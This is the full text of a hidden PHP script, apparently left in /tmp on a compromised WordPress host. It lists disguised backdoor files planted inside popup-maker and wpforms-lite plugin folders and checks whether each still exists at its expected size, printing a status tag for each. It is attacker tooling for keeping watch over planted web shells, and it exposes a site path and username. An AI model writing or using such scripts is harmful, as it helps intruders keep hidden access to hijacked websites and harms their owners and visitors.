File: //proc/thread-self/root/tmp/.data
<?php $r = '/home/florin/sites/dentoutline/current/public'; $x = ["/wp-content/plugins/popup-maker/includes/legacy/importer/easy-modal-v2/model/modal/picmgr.php"=>"bd@@1267253@@1026",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/ConfigSchema/Interchange/spotlight.php"=>"bd@@1266814@@973",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/ChildDef/libmail.php"=>"bd@@1267072@@937",
"/wp-content/plugins/popup-maker/vendor-prefixed/pimple/pimple/src/Pimple/Tests/sug1.php"=>"bd@@1267191@@946",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/HTMLModule/Tidy/field.php"=>"bd@@1266686@@957",
"/wp-content/plugins/contact-1771601883/css/archives-1771601883.php"=>"bd@@1260043@@1106"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');